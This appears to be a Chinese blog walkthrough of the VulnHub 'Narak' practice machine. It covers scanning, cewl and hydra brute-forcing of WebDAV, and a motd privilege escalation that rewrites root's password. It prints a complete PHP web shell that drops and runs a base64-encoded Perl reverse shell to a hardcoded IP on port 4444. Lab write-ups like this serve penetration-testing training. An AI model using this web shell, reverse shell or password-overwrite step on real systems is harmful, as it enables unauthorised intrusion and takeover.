vulnhub靶场-narak

1.查找本机ip

输入ifconfig

2.寻找靶机

kali网段:192.168.19.0/24

namp 192.168.19.0/24 知道一个IP 192.168.19.137 端口22 80(每一个电脑靶机IP不一样)

3.在浏览器输入靶机IP,发现是图片

查看页面源代码看是否有有价值的信息

4.如果源代码没有重要信息,扫描整个网络。

发现上传协议webdav,Webdav一种文件传输协议

5.cewl爬行网站创建密码字典

渗透该协议,发现需要密码

6.暴力破解密码

hydra是一个自动化的爆破工具,暴力破解密码,是一个被迫神器。

语法:Hydra 参数 IP 服务
-l login小写,指定用户名进行破解
-L flie 指定用户名破解·1
-p 小写 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典

注:这里的P和L都是大写

7.在网页中打开http://192.168.19.137/webdav/webshell.php

输入刚刚破解出来的密码

并且同时把账号密码输入到刚刚的命令中。

8.下载webshell

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.145.128";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

这里给大家安利好了,但要注意把里面的ip改成自己本机的IP。

然后使用put命令进入

9.打开监视

nc -lvvp 4444 这个过程稍微有一点久,但大家的电脑应该会很快,我的比较老了

反弹shell,执行下面命令进入python交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

10.BF解码

当我们进入cat hell.sh会发现有一个弥明之众暗示的特殊符号

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

在虚拟机中打开浏览器输入网址

http://www.splitbrain.org/services/ook

密码为:chitragupt

先尝试第一个账号referno

发现第一个flag

12.mot提权获得第二个flag

Motd提权
修改文件 、etc/update-motd.d/00-hradcr
1.	进入到文件夹; /etc/update-motd.d/
2.	修改文件: echo 'echo "root:admin" | sudo chpasswd' >> 00-header
3.	重新登陆
4.	su root

找到第二个flag,圆满完成!!!

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向前进.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值